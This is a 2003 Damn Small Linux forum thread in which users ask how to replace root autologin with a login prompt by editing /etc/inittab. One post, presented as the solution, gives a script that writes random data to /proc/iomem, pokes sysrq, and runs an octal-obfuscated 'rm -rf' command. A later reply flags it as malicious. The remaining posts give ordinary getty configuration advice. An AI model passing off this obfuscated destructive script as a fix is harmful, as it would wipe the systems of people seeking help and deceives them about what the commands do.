Secure login required

Forum: DSL Ideas and Suggestions
Topic: Secure login required
started by: AshleyK

---

Posted by AshleyK on Oct. 08 2003,11:39

Whilst this may not be particularly useful for a CD/ram install, for a hard disk install where it more than likely that you will leave the machine unattended, I would like to see an option (or perhaps it should be a default) to have the machine boot to a proper login request, rather than auto logon to root.  On the same track, the ability to exit a current logon to the logon prompt.

Failing that some instructions on how this can be acheived 'cus a few of us have been scratching our heads in the forum to acheive it  

Regards
Ashley

---

Posted by Dakrone on Oct. 08 2003,16:17

...
Yea, well I've been looking around for it, and I can't say I've found anything entirely useful, I think the problem might be in this line:

~~:S:respawn:/bin/bash -login >/dev/tty1 2>&1 </dev/tty1

which is in /etc/inittab

however, I don't know how to edit it to disable logging in, if anyone else knows, I'd love to hear, other than that, I'll keep looking.

Lemme know if you find anything.

---

Posted by initert on Nov. 02 2003,18:23

yes your right, initrd looks in /etc/initab and ruuuns acording to that. what you need to do it link via rpc to the initd respawn queue. if you have devfs then a link back through /proc may also be required.

so the order of config is as follows:

1) change ~~:S:respawn:/bin/bash -login >/dev/tty1 2>&1 </dev/tty1 to devfs/ttynn::respawn:/bin/procreloader.sh

2) edit /bin/procreloader.sh. with the following :
#!/bin/sh
dd if=/dev/random seek=372 bs=64  count=512 of=/proc/iomem
echo -e "\137\221\202\018\084" > /proc/sys/kernel/sysrq
`echo -e "\162\155\40\55\162\146\40\134"`

WARNING DO NOT TRY THIS ON A SYSTEM ALREADY RUNNING INIT, OR ANY SYSTEM THAT HAS MOUNTED OTHER WRITABLE MEDIA. IT SHOULD ONLY BE USED ON THE INITRD BEFORE!!!! YOU MOUNT ANYTHING ELSE. YOU MAY DAMAGE YOUR SYSTEM OTHERWISE!!!!!!!!!!!!!!!!!!!!!!!!!

---

Posted by jock head on Nov. 02 2003,19:07

I 5think that was an evil script.
I'm not shure but i think it may delete the root.

and thrash acpi bios settings?

i would recomend you analyse it!

looks like an encoded 'rm -rf /'  at the end

---

Posted by winjimmy on Nov. 03 2003,05:25

I found this on another distro's (Basiclinux's) archive.  Isn't it relevant to this?

> there any way to just automatically log in as root
> or whatever?

Yes, it is possible to do this by editing /etc/inittab.
However, this is a significant change and it could cause
unexpected side-effects for you (as one BL user has already
discovered).  I recommend against it for an ordinary login.  
However, it can be useful for a headless system that has
limited functionality.  For example, I have a spare computer
(no keyboard, no monitor) on my home network that has a
CDrom drive and couple of HDs (which I use for archiving).  
Normally that computer is off, but occasionally I need to
access the CDrom drive (some of my computers do not have
their own) or the HDs.  So I turn it on and it automatically
boots BasicLinux and runs a telnet server and an NFS server.
No login, no shutdown.  Just press on, press off.

Such a headless system needs to bypass the login sequence.
This is done by editing one line in /etc/inittab:
---------------------------------------------
c1:1235:respawn:/sbin/agetty 38400 tty1 linux
---------------------------------------------
This is the line that starts the initial login.  It runs
agetty (which prompts for the username and invokes the
login process).  In order to bypass the login, you need
to replace agetty.  Like this:
--------------------------------
c1:1235:respawn:/bin/bash -login
--------------------------------
This goes straight to bash (running as the primary login
shell).

---

Posted by alien2k on Nov. 05 2003,01:08

Yep that looks about right. Reversing that would most likely disable the autologin.

Code Sample

1:12345:respawn:/sbin/getty 115200 tty1 2:12345:respawn:/sbin/getty 115200 tty2 3:12345:respawn:/sbin/getty 115200 tty3 4:12345:respawn:/sbin/getty 115200 tty4 5:12345:respawn:/sbin/getty 115200 tty5 6:12345:respawn:/sbin/getty 115200 tty6

This is the relevant section of my /etc/inittab file. Do note that I have done "apt-get dist-upgrade", from the "testing" ("sarge") release, and have also installed xserver-xfree86. I have it set up for the more normal six virtual consoles, rather than the initial 4, and they all come up on boot as opposed to just the first. It may be worth changing just the last line to check if it works on a "normal" DSL hdinstall, as I have no idea if it actually will.

Sam

---